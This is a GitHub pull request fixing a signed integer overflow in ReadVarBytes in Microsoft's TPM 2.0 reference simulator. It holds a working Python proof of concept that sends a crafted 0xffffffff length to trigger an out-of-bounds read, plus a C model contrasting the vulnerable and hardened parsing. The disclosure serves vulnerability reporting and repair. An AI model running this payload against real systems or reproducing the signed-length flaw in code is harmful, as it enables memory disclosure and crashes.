microsoft / ms-tpm-20-ref

Reference implementation of the TCG Trusted Platform Module 2.0 specification.

fix integer overflow in ReadVarBytes #100

Closed v0id-re closed 1 year ago

v0id-re commented 1 year ago

length is a signed 32-bit integer and is read from input. So if we pass a value that is greater than INT32_MAX, length will become negative. Then it can pass the MaxLen check. The second ReadBytes will return true if NumBytes is negative.

This can cause an out-of-bounds read in TPM_SIGNAL_HASH_DATA because InputBuffer.BufferSize is greater than the real size of InputBuffer. PoC is below.

from socket import socket, AF_INET, SOCK_STREAM

tpmSock = socket(AF_INET, SOCK_STREAM)
tpmSock.connect(('127.0.0.1', 2321))

platformSock = socket(AF_INET, SOCK_STREAM)
platformSock.connect(('127.0.0.1', 2322))

platformSock.send(b'\x00\x00\x00\x01')
platResp = platformSock.recv(32)

print(b"Platform RES32:" + platResp)

tpmSock.send(b'\x00\x00\x00\x05') # TPM_SIGNAL_HASH_START
tpmSock.send(b'\x00\x00\x00\x06') # TPM_SIGNAL_HASH_DATA
tpmSock.send(b'\xff\xff\xff\xff') # -1

resp = tpmSock.recv(4096)
print(b"TPM RES4096:" + resp)
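To make the described bug concrete, here is an added model of the two ReadVarBytes behaviours, written for this page and not the project's own code: a parser that keeps the wire length as a signed int (the pattern the issue describes) beside a hardened one that keeps it unsigned and validates before reporting anything. The Stream type, the probe helper and both frames are constructed for the demonstration.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Constructed stand-in for the socket: a cursor over an in-memory byte string. */
typedef struct { const uint8_t *data; size_t len, pos; } Stream;
/* Same shape as the simulator's ReadBytes loop: a negative count never enters the loop. */
static bool read_bytes(Stream *s, uint8_t *buf, int num_bytes) {
    for (int got = 0; got < num_bytes; got++) {
        if (s->pos >= s->len) return false;       /* short read / peer closed */
        buf[got] = s->data[s->pos++];
    }
    return true;                                  /* reached with num_bytes < 0 too */
}

static uint32_t be32(const uint8_t *b) {
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) | ((uint32_t)b[2] << 8) | b[3];
}
/* Vulnerable pattern from the issue: the length is a signed int taken from the wire. */
static bool read_var_bytes_signed(Stream *s, uint8_t *buf, uint32_t *received, int max_len) {
    uint8_t hdr[4];
    if (!read_bytes(s, hdr, 4)) return false;
    int length = (int)be32(hdr);              /* 0xffffffff becomes -1 */
    *received = (uint32_t)length;             /* caller now believes 0xffffffff bytes arrived */
    if (length > max_len) return false;       /* -1 > max_len is false: bound check bypassed */
    return read_bytes(s, buf, length);        /* negative count: loop skipped, returns true */
}

/* Hardened form: unsigned length, bounds checked before anything is read or reported. */
static bool read_var_bytes_checked(Stream *s, uint8_t *buf, uint32_t *received, uint32_t max_len) {
    uint8_t hdr[4];
    if (!read_bytes(s, hdr, 4)) return false;
    uint32_t length = be32(hdr);
    if (length > max_len || length > INT_MAX) return false;
    if (!read_bytes(s, buf, (int)length)) return false;
    *received = length;                       /* set only once the bytes are really present */
    return true;
}

/* Constructed frames: the PoC's length word with no payload, and a valid 3-byte frame. */
static const uint8_t kBadFrame[4]  = {0xff, 0xff, 0xff, 0xff};
static const uint8_t kGoodFrame[7] = {0x00, 0x00, 0x00, 0x03, 'a', 'b', 'c'};
/* Feeds one frame to either parser; returns the length it reported, or -1 if rejected. */
long long probe(bool hardened, const uint8_t *frame, size_t n) {
    Stream s = {frame, n, 0}; uint8_t buf[16]; uint32_t received = 0;
    bool ok = hardened ? read_var_bytes_checked(&s, buf, &received, sizeof buf)
                       : read_var_bytes_signed(&s, buf, &received, (int)sizeof buf);
    return ok ? (long long)received : -1;
}
```

With the 0xffffffff header and no payload, the signed parser reports success and a 4 GiB length to its caller while having consumed nothing, which is exactly the BufferSize/real-size mismatch the issue describes; the checked parser rejects the frame before any read.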
v0id-re commented 1 year ago

Thanks to @CTF-YeMei

bradlitterell commented 1 year ago

thank you @v0id-re